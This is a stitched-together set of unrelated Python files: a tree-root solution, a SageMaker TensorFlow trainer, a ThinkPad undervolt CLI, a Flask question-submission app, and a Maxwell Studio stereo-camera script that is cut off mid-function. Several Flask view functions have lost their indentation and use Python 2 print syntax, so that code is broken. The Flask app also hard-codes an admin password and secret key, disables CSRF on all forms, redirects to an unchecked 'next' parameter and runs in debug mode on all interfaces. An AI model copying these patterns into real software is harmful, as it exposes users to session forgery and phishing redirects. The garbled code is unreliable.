self.children = children if children is not None else []
"""
class Solution:
    def findRoot(self, tree: List['Node']) -> 'Node':
        """Return the root: the only node that never appears as a child.

        Marks every node encountered as a child; the node left unmarked
        is the root (nodes are keyed by identity).
        """
        has_parent = {}
        for node in tree:
            has_parent.setdefault(node, False)
            for child in node.children:
                has_parent[child] = True
        for node, parented in has_parent.items():
            if not parented:
                return node
class SolutionSet:
    def findRoot(self, tree: List['Node']) -> 'Node':
        """Return the node whose value never appears among any children.

        Assumes node values are unique across the tree.
        """
        child_values = {child.val for node in tree for child in node.children}
        for node in tree:
            if node.val not in child_values:
                return node
|
# Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# A copy of the License is located at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# or in the "license" file accompanying this file. This file is distributed
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
import boto3
import inspect
import os
import tensorflow as tf
from tf_container.run import logger
import tf_container.s3_fs as s3_fs
class Trainer(object):
    """Drives tf.estimator training inside the SageMaker TensorFlow container.

    Wraps a customer-provided script module (estimator_fn / keras_model_fn /
    model_fn plus input functions) and runs train_and_evaluate with a
    RunConfig derived from the customer hyperparameters.
    """

    DEFAULT_TRAINING_CHANNEL = 'training'

    def __init__(self,
                 customer_script,
                 current_host,
                 hosts,
                 train_steps=1000,
                 eval_steps=100,
                 input_channels=None,
                 model_path=None,
                 output_path=None,
                 customer_params=None,
                 save_checkpoints_secs=300):
        """
        Args:
            customer_script: (module) Customer loaded module
            current_host: (str) Current hostname
            hosts: list (str) List with all containers list names
            train_steps: (int) Perform this many steps of training. 'None', the default,
                means train forever.
            eval_steps: (int) 'evaluate' runs until input is exhausted (or another exception
                is raised), or for 'eval_steps' steps, if specified.
            input_channels: (dict) Dictionary with input channels
            model_path: (str) Directory where checkpoints will be saved. Can be a S3 bucket
            output_path: (str) Local directory where the model will be saved
            customer_params: (dict) Hyperparameters forwarded to the customer script.
            save_checkpoints_secs: (int) Checkpoint interval used when the customer
                did not set 'save_checkpoints_secs' themselves.
        """
        # BUGFIX: customer_params previously defaulted to a shared mutable
        # dict ({}). This constructor mutates it below, so every Trainer
        # created without an explicit dict shared (and polluted) the same
        # default object across instances.
        customer_params = {} if customer_params is None else customer_params
        self.customer_script = customer_script
        self.current_host = current_host
        self.hosts = hosts
        self.train_steps = train_steps
        self.eval_steps = eval_steps
        self.input_channels = input_channels
        self.model_path = model_path
        # NOTE(review): attribute keeps the historical typo ('ouput_path');
        # renaming would break external readers of this attribute.
        self.ouput_path = output_path
        self.task_type = None
        customer_params['save_checkpoints_secs'] = customer_params.get('save_checkpoints_secs', save_checkpoints_secs)
        self.customer_params = customer_params
        if model_path.startswith('s3://'):
            s3_fs.configure_s3_fs(model_path)

    def train(self):
        """Build the estimator and run tf.estimator.train_and_evaluate."""
        run_config = self._build_run_config()
        estimator = self._build_estimator(run_config=run_config)
        train_spec = self._build_train_spec()
        eval_spec = self._build_eval_spec()
        tf.estimator.train_and_evaluate(estimator=estimator, train_spec=train_spec, eval_spec=eval_spec)
        return estimator

    def _build_run_config(self):
        """Create a RunConfig from the whitelisted customer hyperparameters."""
        valid_runconfig_keys = ['save_summary_steps', 'save_checkpoints_secs', 'save_checkpoints_steps',
                                'keep_checkpoint_max', 'keep_checkpoint_every_n_hours', 'log_step_count_steps']
        runconfig_params = {k: v for k, v in self.customer_params.items() if k in valid_runconfig_keys}
        logger.info('creating RunConfig:')
        logger.info(runconfig_params)
        run_config = tf.estimator.RunConfig(model_dir=self.model_path, **runconfig_params)
        return run_config

    def _build_estimator(self, run_config):
        """Build the estimator from whichever hook the customer script provides.

        Precedence: estimator_fn > keras_model_fn > model_fn.
        """
        hyperparameters = self.customer_params
        if hasattr(self.customer_script, 'estimator_fn'):
            logger.info('invoking the user-provided estimator_fn')
            return self.customer_script.estimator_fn(run_config, hyperparameters)
        elif hasattr(self.customer_script, 'keras_model_fn'):
            logger.info('invoking the user-provided keras_model_fn')
            model = self.customer_script.keras_model_fn(hyperparameters)
            return tf.keras.estimator.model_to_estimator(keras_model=model, config=run_config)
        else:
            logger.info('creating an estimator from the user-provided model_fn')
            # We must wrap the model_fn from customer_script like this to maintain compatibility with our
            # existing behavior, which passes arguments to the customer model_fn positionally, not by name.
            # The TensorFlow Estimator checks the signature of the given model_fn for a parameter named "params":
            # https://github.com/tensorflow/tensorflow/blob/2c9a67ffb384a13cd533a0e89a96211058fa2631/tensorflow/python/estimator/estimator.py#L1215
            # Wrapping it in _model_fn allows the customer to use whatever parameter names they want. It's unclear whether
            # this behavior is desirable theoretically, but we shouldn't break existing behavior.
            def _model_fn(features, labels, mode, params):
                return self.customer_script.model_fn(features, labels, mode, params)
            return tf.estimator.Estimator(
                model_fn=_model_fn,
                params=hyperparameters,
                config=run_config)

    def _build_train_spec(self):
        """Wrap the customer's train_input_fn (with resolved args) in a TrainSpec."""
        invoke_args = self._resolve_input_fn_args(self.customer_script.train_input_fn)
        train_input_fn = lambda: self.customer_script.train_input_fn(**invoke_args)
        return tf.estimator.TrainSpec(train_input_fn, max_steps=self.train_steps)

    def saves_training(self):
        """True when the customer script provides a serving_input_fn (model export)."""
        return hasattr(self.customer_script, 'serving_input_fn')

    def _build_eval_spec(self):
        """Wrap the customer's eval_input_fn in an EvalSpec, exporting a model if possible."""
        invoke_args = self._resolve_input_fn_args(self.customer_script.eval_input_fn)
        eval_input_fn = lambda: self.customer_script.eval_input_fn(**invoke_args)
        if self.saves_training():
            serving_input_receiver_fn = lambda: self.customer_script.serving_input_fn(self.customer_params)
            exporter = tf.estimator.LatestExporter('Servo',
                                                   serving_input_receiver_fn=serving_input_receiver_fn)
        else:
            logger.warn('serving_input_fn not specified, model NOT saved, use checkpoints to reconstruct')
            exporter = None
        valid_eval_keys = ['start_delay_secs', 'throttle_secs']
        eval_params = {k: v for k, v in self.customer_params.items() if k in valid_eval_keys}
        return tf.estimator.EvalSpec(eval_input_fn, steps=self.eval_steps, exporters=exporter, **eval_params)

    def _resolve_input_fn_args(self, customer_fn):
        """Map each parameter name the customer's input fn declares to its value."""
        # NOTE(review): inspect.getargspec is deprecated (removed in Python
        # 3.11); kept for compatibility with this container's Python version.
        declared_args = inspect.getargspec(customer_fn)
        return {arg: self._resolve_input_fn_param_value(arg) for arg in declared_args.args}

    def _resolve_input_fn_param_value(self, alias_key):
        """
        Handle potentially aliased key name and return value for valid one.
        :return: value for the requested parameter or None
        """
        key_mappings = {('training_dir', 'dir'): 'training_dir',
                        ('hyperparameters', 'params'): 'hyperparameters',
                        ('input_channels', 'channels'): 'input_channels'}
        resolved_key = None
        for k, v in key_mappings.items():
            if alias_key in k:
                resolved_key = v
                break
        parameter_values = {'training_dir': self.input_channels.get(self.DEFAULT_TRAINING_CHANNEL, None),
                            'hyperparameters': self.customer_params,
                            'input_channels': self.input_channels}
        return parameter_values[resolved_key] if resolved_key else None

    def build_tf_config(self):
        """Builds a dictionary containing cluster information based on number of hosts and number of parameter servers.
        More information about TF_Config: https://github.com/tensorflow/tensorflow/blob/master/tensorflow/contrib/learn
        /python/learn/estimators/run_config.py#L77
        :return: task_type and tf_config dictionary
        """
        # First host is the master; the rest are workers. With more than one
        # host, every host additionally runs a parameter server (on port 2223).
        masters = self.hosts[:1]
        workers = self.hosts[1:]
        ps = self.hosts[:] if len(self.hosts) > 1 else None
        self.task_type = self._get_task_type(masters)
        task_map = {'master': masters, 'worker': workers}
        if ps:
            task_map['ps'] = ps
        task_id = task_map[self.task_type].index(self.current_host)

        def build_host_addresses(my_hosts, port='2222'):
            # Hosts become "host:port" addresses for the cluster spec.
            return ['{}:{}'.format(host, port) for host in my_hosts]

        tf_config = {
            'cluster': {
                'master': build_host_addresses(masters),
            },
            'task': {
                'index': task_id,
                'type': self.task_type
            },
            'environment': 'cloud'
        }
        if ps:
            tf_config['cluster']['ps'] = build_host_addresses(ps, port='2223')
        if len(workers) > 0:
            tf_config['cluster']['worker'] = build_host_addresses(workers)
        return tf_config

    def _get_task_type(self, masters):
        """'master' when this host is in the master list, else 'worker'."""
        if self.current_host in masters:
            return 'master'
        return 'worker'
|
# undervolt.py
"""
Undervolt related stuff
"""
import argparse
import os
import pathlib
import sys
from typing import Optional

import thinkpad_tools_assets.classes
from thinkpad_tools_assets.utils import ApplyValueFailedException, NotSudo
try:
    # Privileged MSR access is required for undervolting; refuse to run otherwise.
    if os.getuid() != 0:
        raise NotSudo("Script must be run as superuser/sudo")
except NotSudo:
    print("ERROR: This script must be run as superuser/sudo")
    sys.exit(1)
# PLANE KEY:
# Plane 0: Core
# Plane 1: GPU
# Plane 2: Cache
# Plane 3: Uncore
# Plane 4: Analogio
# Status template for the five voltage planes.
# NOTE(review): each line ends with an explicit \n inside a triple-quoted
# string, producing blank lines between entries; kept as-is since it is
# existing user-visible output.
STATUS_TEXT = '''\
Current status:
Core: {core}\n
GPU: {gpu}\n
Cache: {cache}\n
Uncore: {uncore}\n
Analogio: {analogio}\n
'''
USAGE_HEAD: str = '''\
thinkpad-tools undervolt <verb> [argument]
Supported verbs are:
    status        Print all properties
    set-<property>    Set value
    get-<property>    Get property
Available properties: core, gpu, cache, uncore, analogio
'''
# BUGFIX: the examples previously showed "trackpoint" commands, copied from
# another sub-command; this is the undervolt module.
USAGE_EXAMPLES: str = '''\
Examples:
thinkpad-tools undervolt status
thinkpad-tools undervolt set-core -20
thinkpad-tools undervolt get-gpu
'''
class Undervolt(object):
    """
    Class to handle requests related to Undervolting.

    The attributes core/gpu/cache/uncore/analogio each hold one voltage
    plane's value (see PLANE KEY above) and are read from / written to the
    system via thinkpad_tools_assets.classes.UndervoltSystem.
    """

    # Property name -> voltage-plane index (see PLANE KEY above). Hoisted to a
    # class constant; the original rebuilt this dict on every loop iteration.
    PLANE_INDEX = {"core": 0, "gpu": 1, "cache": 2, "uncore": 3, "analogio": 4}

    def __init__(
            self,
            core: Optional[float] = None,
            gpu: Optional[float] = None,
            cache: Optional[float] = None,
            uncore: Optional[float] = None,
            analogio: Optional[float] = None,
    ):
        # BUGFIX: annotations were written as ``float or None``, which Python
        # evaluates to plain ``float``; Optional[float] is the intended type.
        # self.__register: str = "0x150"
        # self.__undervolt_value: str = "0x80000"
        self.core = core
        self.gpu = gpu
        self.cache = cache
        self.uncore = uncore
        self.analogio = analogio

    def read_values(self):
        """
        Read values from the system into the plane attributes.

        Failures are collected per plane and reported together at the end.
        :return: Nothing
        :raises ApplyValueFailedException: if any plane could not be read
        """
        success = True
        failures: list = list()
        system = thinkpad_tools_assets.classes.UndervoltSystem()
        for prop in self.__dict__.keys():
            h: str = ''
            try:
                h = system.readUndervolt(self.PLANE_INDEX[prop])
            except Exception as e:
                success = False
                failures.append(str(e))
            self.__dict__[prop] = h
        if not success:
            raise ApplyValueFailedException(', '.join(failures))

    def set_values(self):
        """
        Set values to the system MSR using undervolt function.

        Planes whose attribute is None are skipped.
        :return: Nothing
        :raises ApplyValueFailedException: if any plane could not be applied
        """
        system = thinkpad_tools_assets.classes.UndervoltSystem()
        success: bool = True
        failures: list = list()
        for prop in self.__dict__.keys():
            if self.__dict__[prop] is None:
                continue
            try:
                system.applyUndervolt(int(self.__dict__[prop]), self.PLANE_INDEX[prop])
            except Exception as e:
                success = False
                failures.append(str(e))
        if not success:
            raise ApplyValueFailedException(', '.join(failures))

    def get_status_str(self) -> str:
        """
        Return status string
        :return: str: status string
        """
        return STATUS_TEXT.format(
            core=self.core,
            gpu=self.gpu,
            cache=self.cache,
            uncore=self.uncore,
            analogio=self.analogio
        )
class UndervoltHandler(object):
    """
    Handler for Undervolt related commands
    """

    def __init__(self):
        # argparse does the verb/argument splitting; usage and epilog come
        # from the module-level USAGE_HEAD / USAGE_EXAMPLES templates.
        self.parser: argparse.ArgumentParser = argparse.ArgumentParser(
            prog='thinkpad-tools undervolt',
            description='Undervolt related commands',
            usage=USAGE_HEAD,
            epilog=USAGE_EXAMPLES,
            formatter_class=argparse.RawDescriptionHelpFormatter
        )
        self.parser.add_argument('verb', type=str, help='The action going to \
take')
        self.parser.add_argument(
            'arguments', nargs='*', help='Arguments of the action')
        # Holds the per-plane values; populated in run() by read_values().
        self.inner: Undervolt = Undervolt()

    def run(self, unparsed_args: list):
        """
        Parse and execute the command
        :param unparsed_args: Unparsed arguments for this property
        :return: Nothing
        """
        def invalid_property(prop_name: str, exit_code: int):
            """
            Print error message and exit with exit code 1
            :param prop_name: Name of the property
            :param exit_code: Exit code
            :return: Nothing, the problem exits with the given exit code
            """
            print(
                'Invalid command "%s", available properties: ' % prop_name +
                ', '.join(self.inner.__dict__.keys()),
                file=sys.stderr
            )
            exit(exit_code)

        # Parse arguments
        args: argparse.Namespace = self.parser.parse_args(unparsed_args)
        verb: str = str(args.verb).lower()
        # Read values from the system
        self.inner.read_values()
        # Commands
        if verb == 'status':
            print(self.inner.get_status_str())
            return
        if verb.startswith('set-'):
            try:
                prop: str = verb.split('-', maxsplit=1)[1]
            except IndexError:
                invalid_property(verb, 1)
                return
            if prop not in self.inner.__dict__.keys():
                invalid_property(prop, 1)
            # All positional arguments are joined into a single value string.
            self.inner.__dict__[prop] = str(''.join(args.arguments))
            self.inner.set_values()
            print(self.inner.get_status_str())
            return
        if verb.startswith('get-'):
            try:
                prop: str = verb.split('-', maxsplit=1)[1]
            except IndexError:
                # invalid_property() calls exit(), so control never reaches
                # the lines below when the verb has no '-<property>' part.
                invalid_property(verb, 1)
            if not hasattr(self.inner, prop):
                invalid_property(prop, 1)
            if not self.inner.__dict__[prop]:
                # '' means read_values() failed to read this plane earlier.
                print('Unable to read %s' % prop)
                exit(1)
            print(self.inner.__dict__[prop])
            return
        # No match found
        print('Command "%s" not found' % verb, file=sys.stderr)
        exit(1)
|
from flask import Flask, render_template, redirect, url_for, request, flash
from sqlalchemy import Column, Integer, String, ForeignKey, Text, DateTime
from flask.ext.sqlalchemy import SQLAlchemy
from flask.ext import wtf
from flask.ext.login import LoginManager, login_required, UserMixin, login_user, logout_user
from datetime import datetime
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:////tmp/test.db'
# NOTE(review): credentials and the secret key are hard-coded in source;
# they should come from the environment or a config file outside VCS.
app.config['PASSWD'] = 'test'
app.config["USER"] = "admin"
app.secret_key = r'Ma5Jeiquaix6EGhuo7chei1aeNaiLuor6ahfug3iehoh1aes'
db = SQLAlchemy(app)
login_manager = LoginManager()
login_manager.init_app(app)
login_manager.login_view = "login"
# Flash message shown when an anonymous user hits a @login_required view.
login_manager.login_message = u"Sie müssen eingeloggt sein um die Fragen einzusehen."
class User(UserMixin):
    """Single hard-coded admin user backed by app config."""
    # id is constant because there is only ever one account.
    id = 0
    pw = app.config["PASSWD"]
    name = app.config["USER"]

    @staticmethod
    def verify_and_get(username, passwd):
        """Return the singleton user if the credentials match, else None."""
        user = User()
        if username == user.name and passwd == user.pw:
            return user
        return None
@login_manager.user_loader
def load_user(userid):
    """Flask-Login user loader; only one user exists, so userid is ignored."""
    return User()
class LoginForm(wtf.Form):
    """Login form; labels are German (username / password)."""
    username = wtf.TextField(label="Benutzename")
    password = wtf.PasswordField(label="Passwort")
@app.route("/login", methods=["GET", "POST"])
def login():
form = LoginForm(csrf_enabled=False)
if form.validate_on_submit():
user = User.verify_and_get(form.username.data,
form.password.data)
if user is not None:
login_user(user)
flash(u"Erfolgreich eingeloggt.")
return redirect(request.args.get("next") or url_for("answers"))
else:
print "WURST"
flash(u"Falscher Benutzername und/oder Passwort")
return redirect(url_for("login"))
return render_template("login.html", form=form)
@app.route("/logout")
@login_required
def logout():
logout_user()
return redirect(url_for("question"))
class Referent(db.Model):
    """A speaker/presenter that questions can be addressed to."""
    __tablename__ = "referent"
    id = Column(Integer, primary_key=True)
    name = Column(String)

    def __repr__(self):
        # Admin/debug views show the plain name.
        return self.name
class Comment(db.Model):
    """A submitted question; to_id may be NULL (no specific referent)."""
    __tablename__ = "comment"
    id = Column(Integer, primary_key=True)
    to_id = Column(Integer, ForeignKey("referent.id"), nullable=True)
    subject = Column(String, nullable=False)
    body = Column(Text, nullable=False)
    # Submission timestamp, set automatically on insert.
    date = Column(DateTime, default=datetime.now)
    # Backref "comments" on Referent, ordered by submission time.
    to = db.relationship(Referent, backref=db.backref("comments", order_by=lambda:Comment.date))

    def formatted_date(self):
        """Return the date formatted as 'DD.MM HH:MM' for templates."""
        return self.date.strftime("%d.%m %H:%M")
def get_referents():
    """Return all Referent rows (also used as a QuerySelectField factory)."""
    return db.session.query(Referent).all()
class CommentForm(wtf.Form):
    """Question submission form; referent choices come from get_referents()."""
    subject = wtf.TextField(label="Thema")
    referent = wtf.QuerySelectField(query_factory=get_referents, label="Referent")
    body = wtf.TextAreaField(label="Frage")
@app.route('/', methods=["GET", "POST"])
def question():
    """Public page: show the question form and persist submissions."""
    form = CommentForm(csrf_enabled=False)
    if form.validate_on_submit():
        new_question = Comment(to=form.referent.data,
                               subject=form.subject.data,
                               body=form.body.data)
        db.session.add(new_question)
        db.session.commit()
        return redirect(url_for("thanks"))
    return render_template("form.html", form=form)
@app.route("/thanks")
def thanks():
return render_template("thanks.html")
@app.route("/about")
def about():
return render_template("about.html")
@app.route("/answers", defaults={"referent_id": None})
@app.route("/answers/<int:referent_id>")
@login_required
def answers(referent_id):
answers_qry = db.session.query(Referent)
if referent_id is not None:
answers_qry = answers_qry.filter_by(id=referent_id)
answers_refernts = answers_qry.all()
else:
answers_refernts = []
for answer in answers_qry:
if len(answer.comments):
answers_refernts.append(answer)
if request.is_xhr:
return render_template("answer_list.html", answers=answers_refernts)
return render_template("answers.html", referents=get_referents(), answers=answers_refernts)
@app.route("/referents")
@login_required
def referents():
all_referents = db.session.query(Referent).all()
return render_template("referents.html", referents=all_referents)
class ReferentForm(wtf.Form):
    """Form for creating a new referent."""
    name = wtf.TextField(label="Name")
@app.route("/referents/add", methods=["GET", "POST"])
@login_required
def referent_add():
form = ReferentForm(csrf_enabled=False)
if form.validate_on_submit():
new_referent = Referent(name=form.name.data)
db.session.add(new_referent)
db.session.commit()
return redirect(url_for("referents"))
return render_template("referent_add.html", form=form)
if __name__ == '__main__':
    # NOTE(review): debug mode plus binding to 0.0.0.0 are development
    # settings only; do not deploy like this.
    app.debug=True
    app.run(host="0.0.0.0")
|
# Automagic LatLong Stereo for Maxwell Studio
# --------------------------------------------
# 2015-11-30 9:15 am v0.3
# By Andrew Hazelden
# Email: andrew@andrewhazelden.com
# Blog: http://www.andrewhazelden.com
# Description
# -----------
# The automagicLatLongStereo.py script is used to quickly prepare your Maxwell Studio mxs scenes for rendering immersive 360 degree LatLong Stereo VR content.
# Script Installation
# -------------------
# Copy the "stereo" folder to your Maxwell 3.2 scripts directory:
# Windows
# C:/Program Files/Next Limit/Maxwell 3/scripts/
# Linux
# /opt/maxwell/3/scripts/
# Mac
# /Applications/Maxwell 3/scripts/
# How do I use the script?
# ------------------------
# Step 1.
# Edit your Maxwell MXS scene file so there is an active camera. Set the focus distance on the camera to the exact location in the scene that you want to use as the stereo camera rig's zero parallax distance (which is the convergence point for the left and right eyes).
# Step 2.
# Launch PyMaxwell and open up the `automagicLatLongStereo.py` python script.
# Step 3.
# Edit the "mxsFilePath" variable in the main function near the bottom of this script and specify your Maxwell Studio based MXS scene file.
# Edit the separationTexturePath variable in the main function near the bottom of this script and specify your LatLong Stereo separation map texture image.
# Edit the the camera views to render section in the main function near the bottom of this script and specify if you want to render the left, right, or center camera views.
# Step 4. Select the Script > Run menu item in PyMaxwell.
# The script will start running. First the script will verify the mxs scene file exists.
# If the mxs file is located then the scene will be opened in maxwell and the camera parameters will be edited. A LatLong Stereo lens shader extension is applied to the camera.
# Camera's focus distance value will be used as the parallax distance for the lens shader and a suitable camera separation value is calculated based upon the current "stereoDepthStrength" value that is specified in the main function at the bottom of this script.
# Then the lens shader's camera view is adjusted so a set of center, left and right camera view based scene files are generated with the names `<scene>_C.mxs`, `<scene>_L.mxs` and `<scene>.R.mxs`. These new files are saved to the same folder as the original mxs scene file.
# -----------------------------------------
from pymaxwell import *
from math import *
import os
import sys
# Return the lens type name as a string
# Example: it = CmaxwellCameraIterator(); camera = it.first(scene); cameraLens = cameraParams.getLensType(); aml_lensTypeName(cameraLens)
def aml_lensTypeName(cameraLens):
    """Return the human-readable name of a Maxwell camera lens type.

    cameraLens is the tuple returned by camera.getLensType(); element 0
    carries the TYPE_* lens constant. Unknown codes yield ''.
    """
    lensCode = cameraLens[0]
    knownLenses = (
        (TYPE_CYLINDRICAL_LENS, 'Cylindrical'),
        (TYPE_EXTENSION_LENS, 'Extension Lens'),
        (TYPE_FISHEYE_LENS, 'Fisheye'),
        (TYPE_ORTHO_LENS, 'Ortho'),
        (TYPE_PINHOLE_LENS, 'Pinhole'),
        (TYPE_SPHERICAL_LENS, 'Spherical'),
        (TYPE_THIN_LENS, 'Thin'),
    )
    for typeConstant, typeName in knownLenses:
        if lensCode == typeConstant:
            return typeName
    return ''
# Automatically calibrate the current camera rig and prepare it for panoramic 360 degree stereo rendering:
# Example: automagicStereo('/Cube.mxs', 0.01)
def aml_automagicStereo(mxsFilePath, separationTexturePath, stereoDepthStrength):
    """Prepare an MXS scene for LatLong Stereo 360 rendering.

    Loads the scene, switches the active camera to the LatLong Stereo lens,
    derives the parallax distance from the camera's focus distance and the
    camera separation from stereoDepthStrength, then writes _C/_L/_R scene
    files next to the original scene. Returns 1 on success, 0 on failure.
    """
    print('\n\n')
    print('Automagic LatLong Stereo for Maxwell Studio')
    print('By Andrew Hazelden <andrew@andrewhazelden.com>')
    print('-----------------------------------------------\n')
    # Find out the current scene file
    dirName = os.path.dirname(mxsFilePath)
    sceneName = os.path.basename(mxsFilePath)
    scenePathNoExt = os.path.splitext(mxsFilePath)[0]
    # Find out the current scene
    scene = Cmaxwell(mwcallback)
    scene.readMXS(mxsFilePath)
    it = CmaxwellCameraIterator()
    # Camera Details
    #camera = it.first(scene)
    camera = scene.getActiveCamera()
    cameraName = camera.getName()
    # Return the lens type name as a string
    cameraLens = camera.getLensType()
    lensTypeName = aml_lensTypeName(cameraLens)
    # Check if a lens shader is attached to the camera
    lensExt = camera.hasCameraLensExtension()
    # Camera Parameters
    position,focalPoint,up,focalLength,fStop,stepTime,ok = camera.getStep(0)
    # Get object position (camera target)
    #target,ok = object.getPosition()
    # Camera Resolution
    res = camera.getResolution()
    width = res[0]
    height = res[1]
    print('[Working Directory] ' + dirName)
    print('[Input Scene] ' + sceneName + ' [Camera] ' + str(cameraName) + ' [Lens] ' + str(lensTypeName) + ' (' + str(cameraLens[0]) + ')' + ' [Lens Shader Present] ' + str(lensExt) + ' [Resolution] ' + str(width) + 'x' + str(height))
    # -------------------------------------------------------
    # Write the Left and Right stereo camera scenes to disk
    # -------------------------------------------------------
    # Switch the camera to a LatLong Stereo lens
    latlong_stereo_lens_type = 6
    ok = camera.setLensType(latlong_stereo_lens_type)
    if ok == 0:
        print('There was an error changing the lens type')
        return 0
    # Update the lens shader settings
    if lensExt == 0:
        print('\nNote: There are no lens shaders attached to the "' + cameraName + '" camera. You need to set the camera to use a LatLong Stereo lens in Maxwell Studio before running this script.')
        return 0
        # print('Assigning a new LatLong Stereo Lens to the "' + cameraName + '" camera.')
        # Add the lens extension settings
        # -------------------------------------------------
        # Maxwell Python Lens Shader ParamList tips from: https://github.com/uhlik/blendmaxwell/blob/master/support/write_mxs.py
        # print('\nNote: No lens shader is attached. Creating the default lens shader extension params.')
        # params = MXparamList()
        # params.createUInt('Type', 1, 0, 2)
        # params.createFloat('FOV Vertical', 180.0, 180.0, 0.0)
        # params.createFloat('FOV Horizontal', 360.0, 360.0, 0.0)
        # params.createByte('Flip Ray X', 0, 0, 1)
        # params.createByte('Flip Ray Y', 0, 0, 1)
        # params.createFloat('Parallax Distance', 360.0, 0.0, 36000.0)
        # params.createByte('Zenith Mode', 0, 0, 1)
        # params.createFloat('Separation', 6.5, 0.0, 100000.0)
        # Set the lens shader's stereo separation texture map
        # if os.path.exists(separationTexturePath):
        # Note: setPath is from CtextureMap and createTextureMap is from MXparamList
        # tex = CtextureMap()
        # tex.setPath(separationTexturePath)
        # params.createTextureMap('Separation Map', tex)
        #camera.applyCameraLensExtension(params)
        # Alternate code to add the lens extension settings
        # -------------------------------------------------
        # param = MXparamList()
        # param.setUInt('Type', 1)
        # param.setFloat('FOV Vertical', 180.0)
        # param.setFloat('FOV Horizontal', 360.0)
        # param.setByte('Flip Ray X', 0)
        # param.setByte('Flip Ray Y', 0)
        # param.setFloat('Parallax Distance', 360.0)
        # param.setByte('Zenith Mode', 0)
        # param.setFloat('Separation', 6.5)
        # Set the lens shader's stereo separation texture map
        # if os.path.exists(separationTexturePath):
        # setPath is from CtextureMap and setTextureMap is from MXparamList
        # tex = CtextureMap()
        # tex.setPath(separationTexturePath)
        # param.setTextureMap('Separation Map', tex)
        # print('[Separation Map Texture] ' + separationTexturePath )
        # else:
        # print('[The separation map image was not found] ' + separationTexturePath)
        #camera.applyCameraLensExtension(param)
    else:
        print('[LatLong Stereo Lens Shader Present on Camera]')
    # Return the lens type name as a string
    cameraLens = camera.getLensType()
    lensTypeName = aml_lensTypeName(cameraLens)
    # Set the camera resolution to a 2:1 aspect ratio
    outputWidth = height * 2
    outputHeight = height
    camera.setResolution(outputWidth, outputHeight)
    # Convert the focal point or target distance in meters to the lens shader's parallax distance in cm
    x = abs(position[0]-focalPoint[0])
    y = abs(position[1]-focalPoint[1])
    # BUGFIX: the Z delta previously read position[1] (the Y component),
    # which skewed the focus distance whenever Y and Z differed.
    z = abs(position[2]-focalPoint[2])
    focalPointDistance = float(sqrt((x*x)+(y*y)+(z*z)))
    parallaxDistance = focalPointDistance * 100.0
    # Round parallaxDistance to 4 digits of floating point precision
    parallaxDistance = round(parallaxDistance , 4)
    # Use a strong stereo depth strength
    # cameraSeparation = parallaxDistance * (1.0/30.0)
    # Use a standard stereo depth strength
    # cameraSeparation = parallaxDistance * (1.0/55.0)
    # Use a gentle stereo depth strength
    # cameraSeparation = parallaxDistance * (1.0/120.0)
    # Pull the stereo depth multiplier from the script's main function
    cameraSeparation = parallaxDistance * stereoDepthStrength
    # Round cameraSeparation to 4 digits of floating point precision
    cameraSeparation = round(cameraSeparation, 4)
    # ToDo: Assign a gradient3 procedural with a vertical gradient effect / premade camera stereo control texture map
    # Find out the lens params
    # pymaxwell.MXparamList:
    # http://www.maxwellrender.com/api/3.2/doc-python/html/classpymaxwell_1_1_m_xparam_list.html
    lensParams, ok = camera.getCameraLensExtensionParams()
    if ok == 0:
        # Fixed: this error message previously said "changing the lens
        # type", copy-pasted from the setLensType() check above.
        print('There was an error reading the lens parameters')
        return 0
    # Set the parallax distance
    lensParams.setFloat('Parallax Distance', parallaxDistance)
    # Set the camera separation aka. interaxial pupil distance
    lensParams.setFloat('Separation', cameraSeparation)
    # Set the lens shader's stereo separation texture map
    if os.path.exists(separationTexturePath):
        # setTextureMap is from MXparamList
        # setPath is from CtextureMap
        tex = CtextureMap()
        tex.setPath(separationTexturePath)
        ok = lensParams.setTextureMap('Separation Map', tex)
        print('[Separation Map Texture] ' + separationTexturePath )
    else:
        print('[Separation Map Image Not Found] ' + separationTexturePath)
    # Read the lens param items
    mx_type = lensParams.getByName('Type')
    mx_fovVertical = lensParams.getByName('FOV Vertical')
    mx_fovHorizontal = lensParams.getByName('FOV Horizontal')
    mx_flipRayX = lensParams.getByName('Flip Ray X')
    mx_flipRayY = lensParams.getByName('Flip Ray Y')
    mx_parallaxDistance = lensParams.getByName('Parallax Distance')
    mx_zenithMode = lensParams.getByName('Zenith Mode')
    mx_separation = lensParams.getByName('Separation')
    mx_separationMap = lensParams.getTextureMap('Separation Map')
    mx_separationMapFileTexture = mx_separationMap[0].getPath()
    print('\n--------------------------------------')
    print('LatLong Stereo Lens Shader Attributes')
    print('--------------------------------------')
    print('[Lens Type] ' + str(lensTypeName) + ' (' + str(cameraLens[0]) + ')' )
    print('[Lens Parameter Array Items] ' + str(lensParams.getNumItems()) )
    print('Type: ' + str(mx_type) )
    print('FOV Vertical: ' + str(mx_fovVertical) )
    print('FOV Horizontal: ' + str(mx_fovHorizontal) )
    print('Flip Ray X: ' + str(mx_flipRayX) )
    print('Flip Ray Y: ' + str(mx_flipRayY) )
    print('Parallax Distance: ' + str(mx_parallaxDistance) )
    print('Zenith Mode: ' + str(mx_zenithMode) )
    print('Separation: ' + str(mx_separation) )
    print('Separation Map: ' + str(mx_separationMap) )
    print('Separation Map Texture: ' + str(mx_separationMapFileTexture) )
    print('--------------------------------------\n')
    # Read the camera type UInt value
    activeCameraType = lensParams.getUInt('Type')[0]
    #print('[Camera View Type] ' + str(activeCameraType) )
    # Read the camera parallax distance Float value
    activeParallaxDistance = lensParams.getFloat('Parallax Distance')[0]
    #print('[Parallax Distance] ' + str(activeParallaxDistance) )
    # Read the camera separation Float value
    activeCameraSeparation= lensParams.getFloat('Separation')[0]
    #print('[Camera Separation] ' + str(activeCameraSeparation )
    # --------------------------------------------------------
    # Save the Center Camera
    # Switch the lens shader camera view to center
    cameraType = 0
    lensParams.setUInt('Type', cameraType)
    activeCameraType = lensParams.getUInt('Type')[0]
    centerFilename = scenePathNoExt + '_C.mxs'
    print('[Center MXS Scene] ' + os.path.basename(centerFilename) + ' [Lens] ' + 'LatLong Stereo' + ' [Camera View] ' + str(activeCameraType) + ' [Resolution 2:1 Ratio] ' + str(outputWidth) + 'x' + str(outputHeight) + ' [Parallax Distance CM] ' + str(activeParallaxDistance) + ' [Separation CM] ' + str(activeCameraSeparation))
